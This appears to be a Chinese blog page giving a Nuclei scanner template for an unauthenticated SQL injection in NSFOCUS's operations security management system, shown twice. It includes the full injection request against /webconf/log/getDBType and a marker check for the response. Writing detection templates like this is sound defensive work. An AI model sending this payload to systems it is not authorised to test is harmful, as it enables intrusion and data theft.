绿盟运维安全管理系统SQL注入漏洞

### 解析要点

  • **漏洞名称**:绿盟运维安全管理系统SQL注入漏洞

  • **端点与方法**:GET /webconf/log/getDBType

  • **注入点**:`sql` 参数

  • **PoC关键参数**:`cat=espc`、`sid=7473a85e535405e7bd991cb82b2f134c`(假设为测试用固定值)

  • **响应证据**:执行注入后返回 `qppq`(由 `CHR(113)+CHR(112)+CHR(112)+CHR(113)` 生成)

  • **严重级别**:High(SQL注入无权限限制时默认High)

  • **参考链接**:用户提供的微信文章链接

### 最终YAML模板

复制代码
```yaml
id: nsfocus-ops-security-sqli-202512290956
info:
 name: 绿盟运维安全管理系统SQL注入漏洞
 author: auto-generator
 severity: High
 description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
 tags: [web, sqli, nsfocus, vulnerability]
 reference:
 - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
 classification:
 cwe-id: CWE-89
 cve-id: ""
 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
stop-at-first-match: true
http:
 - raw:
 - |
 GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
 Host: {{Hostname}}
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
 Accept: */*
 Connection: close
 matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
 - type: word
 part: body
 words:
 - "qppq"
 case-insensitive: false
``` 

**说明**:

  1. 模板采用PoC原始请求复刻,保留关键参数 `sid` 和 `cat`;

  2. 注入payload生成 `qppq` 字符串作为响应证据;

  3. 若 `sid` 为临时值,需替换为实际有效sid或通过前置请求获取;

  4. 严重级别按无权限限制SQL注入默认设为High,可根据实际CVSS调整。

  5. 符合Nuclei 3.x规范,包含必要的matchers和stop机制。

  6. 严格遵循用户需求,仅输出最终YAML模板,无多余内容。

    yaml 复制代码
    id: nsfocus-ops-security-sqli-202512290956
    
    info:
    
      name: 绿盟运维安全管理系统SQL注入漏洞
    
      author: auto-generator
    
      severity: High
    
      description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
    
      tags: [web, sqli, nsfocus, vulnerability]
    
      reference:
    
        - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
    
      classification:
    
        cwe-id: CWE-89
    
        cve-id: ""
    
        cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    
    stop-at-first-match: true
    
    http:
    
      - raw:
    
          - |
    
            GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
    
            Host: {{Hostname}}
    
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
    
            Accept: */*
    
            Connection: close
    
        matchers-condition: and
    
        matchers:
    
          - type: status
    
            status:
    
              - 200
    
          - type: word
    
            part: body
    
            words:
    
              - "qppq"
    
            case-insensitive: false
相关推荐
菩提小狗2 小时前
第3天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用|小迪安全笔记|网络安全|
前端·安全·小程序
ShenZhenDingYue2 小时前
太阳能航空障碍灯:安全标识的新选择
安全·电力安全·输电线路·安全警示·太阳能航空障碍灯
大布布将军2 小时前
⚡后端安全基石:JWT 原理与身份验证实战
前端·javascript·学习·程序人生·安全·node.js·aigc
ybc46522 小时前
React、Next安全漏洞问题修复和自测
前端·安全·next.js
汽车仪器仪表相关领域2 小时前
ZDT-I 伺服电机测试系统
数据库·功能测试·安全·机器人·压力测试·可用性测试
漏洞文库-Web安全2 小时前
强网杯 2024 web pyblockly 单题wp
安全·web安全·网络安全·ctf
zly35002 小时前
在 CentOS 系统中,重启某一个网卡
linux·运维·centos
QT 小鲜肉2 小时前
【Linux命令大全】001.文件管理之paste命令(实操篇)
linux·运维·服务器·笔记·microsoft
全栈工程师修炼指南2 小时前
Nginx | ngx_cache_purge 模块:实现清除特定上游服务(后端)响应缓存条目
运维·nginx·缓存